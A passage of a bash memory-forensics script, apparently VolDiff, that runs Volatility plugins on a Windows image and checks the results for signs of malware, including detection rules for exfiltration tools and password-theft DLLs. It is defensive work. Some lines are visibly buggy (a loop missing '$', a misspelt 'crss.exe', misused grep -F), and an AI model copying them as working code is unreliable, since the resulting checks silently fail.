      echo -E " //_\\\\| '_ \\ / _` | | | | / __| / __|  / \\/// _ \\/ __| | | | | __/ __|" >> $output_dir/$report
      echo -E "/  _  \\ | | | (_| | | |_| \\__ \\ \\__ \\ / _  \\  __/\\__ \\ |_| | | |_\\__ \\" >> $output_dir/$report
      echo "\_/ \_/_| |_|\__,_|_|\__, |___/_|___/ \/ \_/\___||___/\__,_|_|\__|___/" >> $output_dir/$report
      echo "                     |___/                                            " >> $output_dir/$report
      cat $output_dir/tmpfolder/malware-checks.tmp >> $output_dir/$report
    fi
  fi

  echo -e "\n\nEnd of report." >> $output_dir/$report
  rm -r $output_dir/tmpfolder &> /dev/null

  endtime=$(date +%s)
  echo -e "\nAll done in $(($endtime - $starttime)) seconds, report saved to $output_dir/$report."
  notify-send "VolDiff execution completed."

################################################################## ENTER STANDALONE MODE ################################################################## 

elif [[ $mode = "standalone" ]] ; then
  echo -e "Only one memory image specified: enter standalone mode..."
  ################################ SETTING PROFILE AND FINDING PATH TO MEMORY IMAGES ################################
  if [[ -f $1 ]] ; then
    memory_image=$1
    echo -e "Path to memory image: $memory_image..."
  elif [[ -f infected.raw ]] ; then
    memory_image=infected.raw
    echo -e "Path to memory image is not valid or was not specified. Using default ($memory_image)..."
  elif [[ -f infected.vmem ]] ; then
    memory_image=infected.vmem
    echo -e "Path to memory image is not valid or was not specified. Using default ($memory_image)..."
  else
    echo -e "Please specify a path to a memory image."
    exit
  fi
  if [[ -z $2 ]] ; then
    profile=Win7SP0x86
    echo -e "Profile is not specified. Using default ($profile)..."
  elif [[ $2 != Win7SP1x64 ]] &&  [[ $2 != Win7SP0x86 ]] &&  [[ $2 != Win7SP0x64 ]] &&  [[ $2 != Win7SP1x86 ]] ;  then
    profile=$2
    echo -e "WARNING: This script was only tested using Windows 7 profiles. The specified profile ($profile) seems different!" 
  else
    profile=$2
    echo -e "Profile: $profile..."
  fi

  ################################ CREATING FOLDER TO STORE OUTPUT ################################
  starttime=$(date +%s)
  output_dir=VolDiff_$(date +%F_%R)
  mkdir $output_dir
  mkdir $output_dir/tmpfolder

  ################################ RUNNING VOLATILITY PLUGINS ################################
  echo -e "Running a selection of volatility plugins (time consuming)..."
  for plugin in "{plugins_to_run[@]}" 
  do
    echo -e "Volatility plugin "$plugin" execution in progress..."
    mkdir $output_dir/$plugin
    if [[ $plugin = "mutantscan" ]] || [[ $plugin = "handles" ]] || [[ $plugin = "privs" ]]  || [[ $plugin = "envars" ]] ; then
      vol.py --profile=$profile -f $memory_image $plugin --silent &> $output_dir/$plugin/$plugin.txt
    elif [[ $plugin = "orphanthreads" ]]  ; then
      vol.py --profile=$profile -f $memory_image threads -F OrphanThread &> $output_dir/orphanthreads/orphanthreads.txt
    elif [[ $plugin = "psxview" ]]  ; then
      vol.py --profile=$profile -f $memory_image psxview -R &> $output_dir/psxview/psxview.txt
    elif [[ $plugin = "malfind" ]] ; then
      mkdir $output_dir/$plugin/dump-dir
      vol.py --profile=$profile -f $memory_image $plugin -D $output_dir/$plugin/dump-dir &> $output_dir/$plugin/$plugin.txt
    else
      vol.py --profile=$profile -f $memory_image $plugin &> $output_dir/$plugin/$plugin.txt
    fi
  done
  wait

  if [[ $@ =~ "--malware-checks" ]] ; then
    echo -e "Hunting for anomalies in $memory_image processes..."
    touch $output_dir/tmpfolder/malware-checks.tmp

    ################################ MALWARE CHECKS - NETWORK ################################

    # compute unique IPs from netscan output:
    cat $output_dir/netscan/netscan.txt | grep -o -E "([0-9]{1,3}[\.]){3}[0-9]{1,3}" | sort | uniq | grep -v -E "127\.0\.0\.1|0\.0\.0\.0" > $output_dir/tmpfolder/netscan-uniq-ips.tmp
    if [[ -s $output_dir/tmpfolder/netscan-uniq-ips.tmp ]]; then
      echo -e "\n\nUnique IP addresses from netscan output." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/netscan-uniq-ips.tmp >> $output_dir/tmpfolder/malware-checks.tmp
    fi

    ################################ MALWARE CHECKS - PROCESS CHECKS ################################
   
    # verify PID of System process = 4
    cat $output_dir/psscan/psscan.txt | grep " System " | tr -s ' ' | cut -d " " -f 3 > $output_dir/tmpfolder/system-pids.tmp
    while read pid; do
      if [[ $pid != "4" ]] ; then
        echo -e "\nSuspicious 'System' process running with PID $pid (expected PID 4)." >> $output_dir/tmpfolder/malware-checks.tmp
      fi
    done < $output_dir/tmpfolder/system-pids.tmp

   # verify that only one instance of certain processes is running:
    for process in " services.exe" " System" " wininit.exe" " smss.exe" " lsass.exe" " lsm.exe" " explorer.exe"; do
      if [[ "$(cat $output_dir/psscan/psscan.txt | grep $process | wc -l)" != "1" ]] ; then
        echo -e "\n\nMultiple instances of$process were detected." >> $output_dir/tmpfolder/malware-checks.tmp
        echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
        sed -n '2p' $output_dir/psscan/psscan.txt >> $output_dir/tmpfolder/malware-checks.tmp
        sed -n '3p' $output_dir/psscan/psscan.txt >> $output_dir/tmpfolder/malware-checks.tmp
        cat $output_dir/psscan/psscan.txt | grep $process >> $output_dir/tmpfolder/malware-checks.tmp
      fi
    done

    # verify that some processes do not have a child:
    for process in "lsass.exe" "lsm.exe"; do
      cat $output_dir/psscan/psscan.txt | grep $process | tr -s ' ' | cut -d " " -f 3 >> $output_dir/tmpfolder/cpids.tmp
    done
    cat $output_dir/psscan/psscan.txt | tr -s ' ' | cut -d " " -f 4 >> $output_dir/tmpfolder/ppids.tmp
    while read pid; do
      while read ppid; do
        if [[ "$pid" == "$ppid" ]]; then
          echo -e "\n\nProcess with (PID $ppid) is not supposed to be a parent." >> $output_dir/tmpfolder/malware-checks.tmp
          echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
          sed -n '2p' $output_dir/psscan/psscan.txt >> $output_dir/tmpfolder/malware-checks.tmp
          sed -n '3p' $output_dir/psscan/psscan.txt >> $output_dir/tmpfolder/malware-checks.tmp
          cat $output_dir/psscan/psscan.txt | grep " $ppid " >> $output_dir/tmpfolder/malware-checks.tmp
        fi
      done < $output_dir/tmpfolder/ppids.tmp
    done < $output_dir/tmpfolder/cpids.tmp

    # verify child/parent process relationships:
    for child in " svchost.exe" " smss.exe" " conhost.exe" " audiodg.exe" " services.exe" " lsass.exe" " lsm.exe" " taskhost.exe" " spoolsv.exe" " sppsvc.exe" " taskhost.exe" " mscorsvw.exe" " TPAutoConnSvc" " SearchIndexer" " WmiPrvSE.exe" ; do
      if [[ $child = " sppsvc.exe" ]] || [[ $child = " taskhost.exe" ]] || [[ $child = " mscorsvw.exe" ]] || [[ $child = " TPAutoConnSvc" ]] || [[ $child = " SearchIndexer" ]] || [[ $child = " svchost.exe" ]] || [[ $child = " taskhost.exe" ]] || [[ $child = " spoolsv.exe" ]] ; then parent=" services.exe" ; fi
      if [[ $child = " smss.exe" ]] ; then parent=" System" ; fi
      if [[ $child = " WmiPrvSE.exe" ]] || [[ $child = " audiodg.exe" ]]  ; then parent=" svchost.exe"; fi
      if [[ $child = " conhost.exe" ]] ; then parent=" csrss.exe" ; fi
      if [[ $child = " services.exe" ]] || [[ $child = " lsass.exe" ]] || [[ $child = " lsm.exe" ]] ; then parent=" wininit.exe" ; fi

      if grep $child $output_dir/psscan/psscan.txt > /dev/null ; then
        if [[ "$(cat $output_dir/psscan/psscan.txt | grep $parent | wc -l)" = "1" ]] ; then
          cat $output_dir/psscan/psscan.txt | grep $child | tr -s ' ' | cut -d " " -f 4 > $output_dir/tmpfolder/child-ppids.tmp
          parent_pid="$(cat $output_dir/psscan/psscan.txt | grep $parent | tr -s ' ' | cut -d ' ' -f 3)"
          while read ppid; do
            ppid=$( printf $ppid )
            parent_pid=$( printf $parent_pid )
            if [[ $ppid != $parent_pid ]] ; then
              tail -n +4 $output_dir/psscan/psscan.txt | tr -s ' ' | cut -d ' ' -f 2-3 | grep -i " "$ppid | cut -d ' ' -f 1 | sort | uniq > $output_dir/tmpfolder/ppidprocess.tmp
              if [[ -s $output_dir/tmpfolder/ppidprocess.tmp ]] ; then   
                ppidlines=`cat $output_dir/tmpfolder/ppidprocess.tmp | wc -l`  &> /dev/null
                if [[ $ppidlines = 1 ]] ; then
                  echo -e "\n\nUnexpected parent process for$child: PPID $ppid (`cat $output_dir/tmpfolder/ppidprocess.tmp`) instead of PPID $parent_pid ($parent )." >> $output_dir/tmpfolder/malware-checks.tmp
                  echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
                  sed -n '2p' $output_dir/psscan/psscan.txt >> $output_dir/tmpfolder/malware-checks.tmp
                  sed -n '3p' $output_dir/psscan/psscan.txt >> $output_dir/tmpfolder/malware-checks.tmp
                  cat $output_dir/psscan/psscan.txt | grep " $ppid " >> $output_dir/tmpfolder/malware-checks.tmp
                else
                  cat $output_dir/tmpfolder/ppidprocess.tmp | tr '\n' ' ' > $output_dir/tmpfolder/ppparents.tmp
                  echo -e "\n\nUnexpected parent process for$child: PPID $ppid ( multiple associated processes: `cat $output_dir/tmpfolder/ppparents.tmp`) instead of PPID $parent_pid ($parent )." >> $output_dir/tmpfolder/malware-checks.tmp
                  echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
                  sed -n '2p' $output_dir/psscan/psscan.txt >> $output_dir/tmpfolder/malware-checks.tmp
                  sed -n '3p' $output_dir/psscan/psscan.txt >> $output_dir/tmpfolder/malware-checks.tmp
                  cat $output_dir/psscan/psscan.txt | grep " $ppid " >> $output_dir/tmpfolder/malware-checks.tmp
                fi
              else
                echo -e "\n\nUnexpected parent process for$child: PPID $ppid (could not map associated process name) instead of PPID $parent_pid ($parent )." >> $output_dir/tmpfolder/malware-checks.tmp
                echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
                sed -n '2p' $output_dir/psscan/psscan.txt >> $output_dir/tmpfolder/malware-checks.tmp
                sed -n '3p' $output_dir/psscan/psscan.txt >> $output_dir/tmpfolder/malware-checks.tmp
                cat $output_dir/psscan/psscan.txt | grep " $ppid " >> $output_dir/tmpfolder/malware-checks.tmp
              fi
            fi     
          done < $output_dir/tmpfolder/child-ppids.tmp
        fi
      fi

    done

    # verify that every process has a parent (except for explorer.exe, csrss.exe, wininit.exe and winlogon.exe):
    mkdir $output_dir/tmpfolder/ppids
    tail -n +4 $output_dir/psscan/psscan.txt | tr -s ' ' | cut -d ' ' -f 4 | sort | uniq | grep -v "^0$" > $output_dir/tmpfolder/ppids/ppids.temp
    tail -n +4 $output_dir/psscan/psscan.txt | tr -s ' ' | cut -d ' ' -f 3 | sort | uniq > $output_dir/tmpfolder/ppids/pids.temp
    while read ppid; do 
      if ! grep -E "^$ppid$" $output_dir/tmpfolder/ppids/pids.temp > /dev/null ; then
        tail -n +4 $output_dir/psscan/psscan.txt | tr -s ' ' | cut -d ' ' -f 2,3,4 | grep -E " $ppid$" | cut -d ' ' -f 1 | sort | uniq > $output_dir/tmpfolder/ppids/processes-$ppid.temp
        cat $output_dir/tmpfolder/ppids/processes-$ppid.temp | tr '\n' ' ' > $output_dir/tmpfolder/ppids/processes-$ppid-space.temp
        if  ! grep -E -i "explorer.exe|csrss.exe|wininit.exe|winlogon.exe" $output_dir/tmpfolder/ppids/processes-$ppid-space.temp > /dev/null ; then 
          echo -e "\n\nPPID $ppid does not have an associated process." >> $output_dir/tmpfolder/malware-checks.tmp
          echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
          sed -n '2p' $output_dir/psscan/psscan.txt >> $output_dir/tmpfolder/malware-checks.tmp
          sed -n '3p' $output_dir/psscan/psscan.txt >> $output_dir/tmpfolder/malware-checks.tmp
          cat $output_dir/psscan/psscan.txt | grep " $ppid " >> $output_dir/tmpfolder/malware-checks.tmp
        fi 
      fi  
    done < $output_dir/tmpfolder/ppids/ppids.temp

    # verify processes are running in expected sessions:
    for process in " wininit.exe" " services.exe" " lsass.exe" " svchost.exe" " lsm.exe" " winlogon.exe" ; do
      if [[ $process = " csrss.exe" ]] || [[ $process = " wininit.exe" ]] || [[ $process = " services.exe" ]] || [[ $process = " lsass.exe" ]] || [[ $process = " svchost.exe" ]]|| [[ $process = " lsm.exe" ]]; then session="0"; fi
      if [[ $process = " winlogon.exe" ]] ; then session="1" ; fi
      cat $output_dir/pslist/pslist.txt | grep $process | tr -s ' ' | cut -d ' ' -f 7 > $output_dir/tmpfolder/process_sessions.tmp
      while read psession; do
        if [[ $psession != $session ]] ; then
          echo -e "\n\nProcess$process running in unexpected session ($psession instead of $session)." >> $output_dir/tmpfolder/malware-checks.tmp
          echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
          sed -n '2p' $output_dir/pslist/pslist.txt >> $output_dir/tmpfolder/malware-checks.tmp
          sed -n '3p' $output_dir/pslist/pslist.txt >> $output_dir/tmpfolder/malware-checks.tmp
          cat $output_dir/pslist/pslist.txt | grep $process >> $output_dir/tmpfolder/malware-checks.tmp
        fi
      done < $output_dir/tmpfolder/process_sessions.tmp
    done

    # check process executable path:
    for process in "smss.exe" "crss.exe" "wininit.exe" "services.exe" "lsass.exe" "svchost.exe" "lsm.exe" "explorer.exe" "winlogon"; do
      if [[ $process == "smss.exe" ]]; then processpath="\systemroot\system32\smss.exe" ; fi
      if [[ $process == "crss.exe" ]]; then processpath="\windows\system32\csrss.exe" ; fi
      if [[ $process == "wininit.exe" ]]; then processpath="\windows\system32\wininit.exe" ; fi
      if [[ $process == "services.exe" ]]; then processpath="\windows\system32\services.exe" ; fi
      if [[ $process == "lsass.exe" ]]; then processpath="\windows\system32\lsass.exe" ; fi
      if [[ $process == "svchost.exe" ]]; then processpath="\windows\system32\svchost.exe" ; fi
      if [[ $process == "lsm.exe" ]]; then processpath="\windows\system32\lsm.exe" ; fi
      if [[ $process == "explorer.exe" ]]; then processpath="\windows\explorer.exe" ; fi
      if [[ $process == "winlogon.exe" ]]; then processpath="\windows\system32\winlogon.exe" ; fi
      if [[ $process == "sppsvc.exe" ]]; then processpath="\windows\system32\sppsvc.exe" ; fi
      cat $output_dir/dlllist/dlllist.txt | grep -i -A 1 $process | grep "Command line" | grep -o '\\.*' | cut -d ' ' -f 1 | tr '[:upper:]' '[:lower:]' | sed 's,\\,\\\\,g' > $output_dir/tmpfolder/path_list.tmp
      if [[ -s $output_dir/tmpfolder/path_list.tmp ]]; then
        while read path; do
          if [[ "$path" != "$processpath" ]]; then
            echo -e "\n\nProcess running from an unexpected path." >> $output_dir/tmpfolder/malware-checks.tmp
            echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
            echo -e "Process $process is running from $path instead of $processpath" >> $output_dir/tmpfolder/malware-checks.tmp
          fi
        done < $output_dir/tmpfolder/path_list.tmp
      fi
    done

    # verify if any processes have suspicious l33t names:
    cat $output_dir/psscan/psscan.txt | grep -E -i $l33t_process_name > $output_dir/tmpfolder/suspicious_process.tmp
    if [[ -s $output_dir/tmpfolder/suspicious_process.tmp ]]; then
      echo -e "\n\nProcess with suspicious name." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '2p' $output_dir/psscan/psscan.txt >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '3p' $output_dir/psscan/psscan.txt >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/suspicious_process.tmp >> $output_dir/tmpfolder/malware-checks.tmp
    fi

    # verify if any hacker tools were used in process list:
    cat $output_dir/psscan/psscan.txt | grep -E -i $hacker_process_regex > $output_dir/tmpfolder/suspicious_tools.tmp
    if [[ -s $output_dir/tmpfolder/suspicious_tools.tmp ]]; then
      echo -e "\n\nProcesses that may have been used for lateral movement, exfiltration etc." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '2p' $output_dir/psscan/psscan.txt >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '3p' $output_dir/psscan/psscan.txt >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/suspicious_tools.tmp >> $output_dir/tmpfolder/malware-checks.tmp
    fi

    # detect process hollowing:
    mkdir $output_dir/tmpfolder/hollowing
    vol.py --profile=$profile -f $memory_image procdump -u -D $output_dir/tmpfolder/hollowing/ &> /dev/null
    cat $output_dir/psscan/psscan.txt | tr -s ' ' | cut -d ' ' -f 2 | cut -d '.' -f 1 | sort | uniq > $output_dir/tmpfolder/process-names.tmp
    tail -n +4 $output_dir/tmpfolder/process-names.tmp > $output_dir/tmpfolder/procnames.tmp
    while read process ; do
      cat $output_dir/psscan/psscan.txt | grep -i $process | tr -s ' ' | cut -d ' ' -f 3 > $output_dir/tmpfolder/$process-pids.tmp
      touch $output_dir/tmpfolder/$process-size.tmp
      while read pid ; do
        ls -l $output_dir/tmpfolder/hollowing/ | tr -s ' ' | cut -d ' ' -f5,9 | grep -i "executable.$pid.exe" | cut -d ' ' -f 1 >> $output_dir/tmpfolder/$process-size.tmp
      done < $output_dir/tmpfolder/$process-pids.tmp
      cat $output_dir/tmpfolder/$process-size.tmp | uniq > $output_dir/tmpfolder/$process-size-uniq.tmp
      lines=`wc -l < $output_dir/tmpfolder/$process-size-uniq.tmp`
      if [[ $lines != 1 ]] && [[ $lines != 0 ]]  ; then 
        echo -e "\n\nPotential process hollowing detected in $process (based on size)." >> $output_dir/tmpfolder/malware-checks.tmp
        echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
        echo -e "Process    PID  Size" >> $output_dir/tmpfolder/malware-checks.tmp
        echo -e "-----------------------------------" >> $output_dir/tmpfolder/malware-checks.tmp
        while read pid ; do
          echo -e "$process    $pid  `ls -l $output_dir/tmpfolder/hollowing/ | tr -s ' ' | cut -d ' ' -f5,9 | grep -i "executable.$pid.exe" | cut -d ' ' -f 1`" >> $output_dir/tmpfolder/malware-checks.tmp
        done < $output_dir/tmpfolder/$process-pids.tmp   
      fi
    done < $output_dir/tmpfolder/procnames.tmp

    # detect processes with exit time but active threads:
    cat $output_dir/psxview/psxview.txt | tr -s ' ' | cut -d ' ' -f 1,2,6,13 | grep "UTC" | grep "True" | cut -d ' ' -f 1 > $output_dir/tmpfolder/exit_with_threads.tmp
    if [[ -s $output_dir/tmpfolder/exit_with_threads.tmp ]]; then
      echo -e "\n\nProcess(es) with exit time and active threads running." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '2p' $output_dir/psxview/psxview.txt >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '3p' $output_dir/psxview/psxview.txt >> $output_dir/tmpfolder/malware-checks.tmp
      while read procname ; do 
        cat $output_dir/psxview/psxview.txt | grep $procname >> $output_dir/tmpfolder/malware-checks.tmp
      done < $output_dir/tmpfolder/exit_with_threads.tmp
    fi

    # check if any proces has domain or enterprise admin privileges:
    cat $output_dir/getsids/getsids.txt | egrep '(Domain Admin|Enterprise Admin|Schema Admin)' > $output_dir/tmpfolder/suspicious_privlege.tmp
    if [[ -s $output_dir/tmpfolder/suspicious_privlege.tmp ]]; then
      echo -e "\n\nProcess(es) with domain or enterprise admin privileges." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/suspicious_privlege.tmp >> $output_dir/tmpfolder/malware-checks.tmp
    fi

    # check if any process has debug privileges:
    cat $output_dir/privs/privs.txt | grep -i "debug" > $output_dir/tmpfolder/debug_privs.tmp
    if [[ -s $output_dir/tmpfolder/debug_privs.tmp ]]; then
      echo -e "\n\nProcess(es) with debug privileges." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '2p' $output_dir/privs/privs.txt >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '3p' $output_dir/privs/privs.txt >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/debug_privs.tmp >> $output_dir/tmpfolder/malware-checks.tmp
    fi

    # check if any process has a raw socket handle:
    cat $output_dir/handles/handles.txt | grep -F "\Device\RawIp" > $output_dir/tmpfolder/raw_socket.tmp
    if [[ -s $output_dir/tmpfolder/raw_socket.tmp ]]; then
      echo -e "\n\nRaw socket handles." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '2p' $output_dir/handles/handles.txt >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '3p' $output_dir/handles/handles.txt >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/raw_socket.tmp >> $output_dir/tmpfolder/malware-checks.tmp
    fi

    # check if any process has a handle to a remote mapped share:
    cat $output_dir/handles/handles.txt | grep -F "\\\\Device\\\\(LanmanRedirector|Mup)" > $output_dir/tmpfolder/remote_shares.tmp
    if [[ -s $output_dir/tmpfolder/remote_shares.tmp ]]; then
      echo -e "\n\nRemote share handles." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '2p' $output_dir/handles/handles.txt >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '3p' $output_dir/handles/handles.txt >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/remote_shares.tmp >> $output_dir/tmpfolder/malware-checks.tmp
    fi

    ################################ MALWARE CHECKS - DLLs ################################

    # find new dlls (atoms):
    cat $output_dir/atoms/atoms.txt | grep -i -E ".dll$"  >> $output_dir/tmpfolder/atoms.tmp
    if [[ -s $output_dir/tmpfolder/atoms.tmp ]] ; then
      echo -e "\n\nDLLs found in atoms output." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '2p' $output_dir/atoms/atoms.txt >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '3p' $output_dir/atoms/atoms.txt >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/atoms.tmp >> $output_dir/tmpfolder/malware-checks.tmp
    fi

    # find new dlls (atomscan):
    cat $output_dir/atomscan/atomscan.txt | grep -i -E ".dll$"  >> $output_dir/tmpfolder/atomscan.tmp
    if [[ -s $output_dir/tmpfolder/atomscan.tmp ]] ; then
      echo -e "\n\nDLLs found in atomscan output." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '2p' $output_dir/atomscan/atomscan.txt >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '3p' $output_dir/atomscan/atomscan.txt >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/atomscan.tmp >> $output_dir/tmpfolder/malware-checks.tmp
    fi

    # highlight hidden DLLs (ldrmodules):
    cat $output_dir/ldrmodules/ldrmodules.txt | grep "False" | grep -E -v -i "system32|explorer.exe|iexplore.exe|.fon$" | sort | uniq > $output_dir/tmpfolder/ldrmodules.tmp
    if [[ -s $output_dir/tmpfolder/ldrmodules.tmp ]] ; then
      echo -e "\n\nSuspicious ldrmodules entries." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '2p' $output_dir/ldrmodules/ldrmodules.txt >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '3p' $output_dir/ldrmodules/ldrmodules.txt >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/ldrmodules.tmp >> $output_dir/tmpfolder/malware-checks.tmp
    fi
    # find highly suspicious DLLs used for password stealing (ldrmodules):
    cat $output_dir/ldrmodules/ldrmodules.txt | grep -E -i $hacker_dll_regex | sort | uniq > $output_dir/tmpfolder/ldrmodule_hacker.tmp
    if [[ -s $output_dir/tmpfolder/ldrmodule_hacker.tmp ]] ; then
      echo -e "\n\nDLLs that may have been used for password theft." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '2p' $output_dir/ldrmodules/ldrmodules.txt >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '3p' $output_dir/ldrmodules/ldrmodules.txt >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/ldrmodule_hacker.tmp >> $output_dir/tmpfolder/malware-checks.tmp
    fi

    # find DLLs with no path / no name (indicates process hollowing) (ldrmodules):
    cat $output_dir/ldrmodules/ldrmodules.txt | grep -E -i "no name" | sort | uniq > $output_dir/tmpfolder/ldrmodule_hollow.tmp
    if [[ -s $output_dir/tmpfolder/ldrmodule_hollow.tmp ]] ; then
      echo -e "\n\nDLLs with no path/name (indicates process hollowing)." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '2p' $output_dir/ldrmodules/ldrmodules.txt >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '3p' $output_dir/ldrmodules/ldrmodules.txt >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/ldrmodule_hollow.tmp >> $output_dir/tmpfolder/malware-checks.tmp
    fi

    ################################ MALWARE CHECKS - FILES ################################

    # find DLLs/EXES loaded from temp folders (dlllist):
    cat $output_dir/dlllist/dlllist.txt | grep -E -i "TMP|TEMP|AppData" | sort | uniq > $output_dir/tmpfolder/dlllist_temp.tmp
    if [[ -s $output_dir/tmpfolder/dlllist_temp.tmp ]] ; then
      echo -e "\n\nDLLs/EXEs loaded from temp folders." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/dlllist_temp.tmp >> $output_dir/tmpfolder/malware-checks.tmp
    fi

    # find hidden DLLs/EXEs (ldrmodules):
    cat $output_dir/ldrmodules/ldrmodules.txt | grep -E -i "False  False  False" | sort | uniq | grep -E -i ".dll$|.exe$" > $output_dir/tmpfolder/ldrmodule_hidden.tmp
    if [[ -s $output_dir/tmpfolder/ldrmodule_hidden.tmp ]] ; then
      echo -e "\n\nDLLs/EXEs hidden from ldrmodules." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '2p' $output_dir/ldrmodules/ldrmodules.txt >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '3p' $output_dir/ldrmodules/ldrmodules.txt >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/ldrmodule_hidden.tmp >> $output_dir/tmpfolder/malware-checks.tmp
    fi

    # highlight prefetch files:
    cat $output_dir/mftparser/mftparser.txt | grep \.pf$ | awk '{print $NF}' | sort | uniq > $output_dir/tmpfolder/prefetch.tmp
    if [[ -s $output_dir/tmpfolder/prefetch.tmp ]]; then
      echo -e "\n\nPrefetch artifacts." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/prefetch.tmp >> $output_dir/tmpfolder/malware-checks.tmp
    fi

    # highlight binaries loaded from TEMP folders:
    cat $output_dir/envars/envars.txt | grep -i "TEMP" > $output_dir/tmpfolder/temp_envars.tmp
    if [[ -s $output_dir/tmpfolder/temp_envars.tmp ]]; then
      echo -e "\n\nPossible binaries loaded from TEMP folders (envars)." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '2p' $output_dir/envars/envars.txt >> $output_dir/tmpfolder/malware-checks.tmp
      sed -n '3p' $output_dir/envars/envars.txt >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/temp_envars.tmp >> $output_dir/tmpfolder/malware-checks.tmp
    fi

    # find interesting executables (dlllist):
    cat $output_dir/dlllist/dlllist.txt | grep "Command line" | grep -E -v -i "system32|explorer.exe|iexplore.exe" | sed -e 's/Command line : //' | sort | uniq > $output_dir/tmpfolder/execs.tmp
    if [[ -s $output_dir/tmpfolder/execs.tmp ]] ; then
      echo -e "\n\nInteresting executables (dlllist)." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/execs.tmp >> $output_dir/tmpfolder/malware-checks.tmp
    fi

    # highlight alternate data stream files:
    cat $output_dir/mftparser/mftparser.txt | grep "DATA ADS" > $output_dir/tmpfolder/ads.tmp
    if [[ -s $output_dir/tmpfolder/ads.tmp ]]; then
      echo -e "\n\nAlternate Data Stream (ADS) files." >> $output_dir/tmpfolder/malware-checks.tmp
      echo -e "===========================================================================\n" >> $output_dir/tmpfolder/malware-checks.tmp
      cat $output_dir/tmpfolder/ads.tmp >> $output_dir/tmpfolder/malware-checks.tmp
    fi

    ################################ MALWARE CHECKS - MISC ################################

    # find interresting entries in hosts file
    mkdir $output_dir/tmpfolder/hosts
    qaddress=$(cat $output_dir/filescan/filescan.txt | grep -i -E "etc\\\\hosts$" | tr -s ' ' | cut -d ' ' -f 1)
    if [[ ! -z "$qaddress" ]] ; then 
      vol.py --profile=$profile -f $memory_image dumpfiles -Q $qaddress -D $output_dir/tmpfolder/hosts --name &> /dev/null 
      strings $output_dir/tmpfolder/hosts/* > $output_dir/tmpfolder/hosts.tmp  &> /dev/null
    fi
